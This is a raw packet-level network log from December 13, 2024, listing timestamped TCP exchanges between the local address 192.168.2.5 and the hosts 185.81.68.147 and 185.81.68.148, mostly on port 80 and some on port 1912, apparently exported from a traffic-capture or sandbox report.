Dec 13, 2024 01:37:32.349975109 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:32.349983931 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413073063 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413113117 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413149118 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413173914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413410902 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413531065 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413564920 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413587093 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413600922 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413616896 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413651943 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413763046 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413813114 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.413868904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.413912058 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.416150093 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.416213036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.416892052 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.416939020 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.417907953 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.417943001 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.417990923 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.418404102 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.418464899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.418595076 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.418631077 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.418683052 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.418761969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.418992996 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.419506073 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.419576883 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.419641018 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.419692039 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.420150042 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.420342922 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.420347929 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.420394897 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.421181917 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.421233892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.421313047 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.421394110 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.422024965 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.422077894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.422082901 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.422127008 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.422894001 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.422929049 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.422956944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.422969103 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.423736095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.423769951 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.423799992 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.423811913 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.424582005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.424616098 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.424653053 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.424664974 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.425457001 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.425492048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.425518990 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.425530910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.426139116 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.426213026 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.426291943 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.426440001 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.427182913 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.427216053 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.427237988 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.427253008 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.427890062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.427936077 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.428033113 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.428159952 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.428740978 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.428787947 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.428886890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.429234028 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.429651022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.429837942 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.429887056 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.430519104 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.430574894 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.430694103 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.430738926 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.431252003 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.431308031 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.431406975 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.431452036 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.432110071 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.432154894 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.432271004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.432977915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.433028936 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.433154106 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.433851004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.433897018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.434005976 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.434048891 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.434833050 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.434868097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.434916973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.435695887 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.435733080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.435781002 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.436382055 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.436460018 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.436538935 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.436580896 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.437411070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.437444925 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.437460899 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.437482119 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.438299894 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.438333988 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.438352108 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.438374043 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.439011097 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.439044952 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.439063072 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.439085960 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.439889908 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.439923048 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.439943075 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.439961910 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.440726042 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.440777063 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.440912008 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.440960884 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.441541910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.441598892 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.441675901 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.441720009 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.442362070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.442416906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.442540884 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.442591906 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.443178892 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.443317890 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.443391085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.443440914 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.444155931 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.444211006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.444328070 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.444447041 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.445012093 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.445060968 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.445183992 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.445234060 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.446316004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.446352005 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.446369886 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.446393967 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.446770906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.446822882 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.446933985 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.446981907 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.447619915 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.447767973 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.447798967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.447846889 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.448467970 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.448518991 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.448669910 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.448714972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.449284077 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.449338913 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456098080 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456130981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456149101 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456165075 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456171989 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456203938 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456250906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456286907 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456299067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456321955 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.456939936 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.456991911 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.457077980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.457127094 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.457791090 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.457848072 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.461568117 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.461623907 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.461708069 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.461910009 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.462074041 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.462109089 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.462126970 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.462138891 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.462925911 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.462970972 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.463097095 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.463149071 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.463948965 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.463983059 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.463993073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.464030027 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.464651108 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.464699984 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.464783907 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.464832067 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.465547085 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.465600014 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.465723038 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.465770006 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.466418028 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.466450930 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.466496944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.470946074 CET	80	49752	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:32.471134901 CET	80	49762	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.471164942 CET	80	49761	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:32.471209049 CET	49752	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:32.471276045 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.471280098 CET	80	49751	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.471313953 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:32.471376896 CET	49751	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.471972942 CET	49762	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.472117901 CET	49761	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:32.589675903 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589715004 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589750051 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589785099 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589818954 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589852095 CET	1912	49738	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.589862108 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.589862108 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.589931965 CET	49738	1912	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.591741085 CET	80	49762	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.591851950 CET	80	49761	185.81.68.148	192.168.2.5
Dec 13, 2024 01:37:32.604914904 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.604948997 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.604983091 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.605015993 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.605026007 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.605060101 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.605060101 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.605539083 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.605572939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.605596066 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.605612993 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.606873035 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.606906891 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.606966019 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.607002020 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.607373953 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.607425928 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.608089924 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.608124971 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.608140945 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.609154940 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.609189034 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.609200954 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.609603882 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.609638929 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.609647989 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.609677076 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.611150026 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.611183882 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.611228943 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.611356020 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.611392021 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.611437082 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.612582922 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.612616062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.612629890 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.614101887 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.614620924 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.614654064 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.614670992 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.614689112 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.614692926 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.614722967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.614731073 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.614758968 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.614801884 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.615113974 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.615371943 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.615660906 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.615695953 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.615745068 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.616727114 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.616760969 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.616821051 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.617229939 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619375944 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.619394064 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619427919 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619462013 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619474888 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.619496107 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619507074 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.619533062 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.619575977 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.621512890 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621582985 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621649027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621658087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.621682882 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621716022 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621733904 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.621752024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.621757984 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.622607946 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.622642040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.622663021 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.622698069 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.623405933 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.623440027 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.623491049 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.624706030 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.624739885 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.624806881 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.627202034 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627285004 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627338886 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627352953 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.627372980 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627377987 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.627408028 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627441883 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627451897 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.627593040 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.627640963 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.628695011 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.628727913 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.628761053 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.628786087 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.628807068 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.629153967 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.629760981 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.629815102 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.631409883 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.631443024 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.631475925 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.631494045 CET	49753	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:32.631510973 CET	80	49753	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:32.631520033 CET	49753	80	192.168.2.5	185.81.68.147
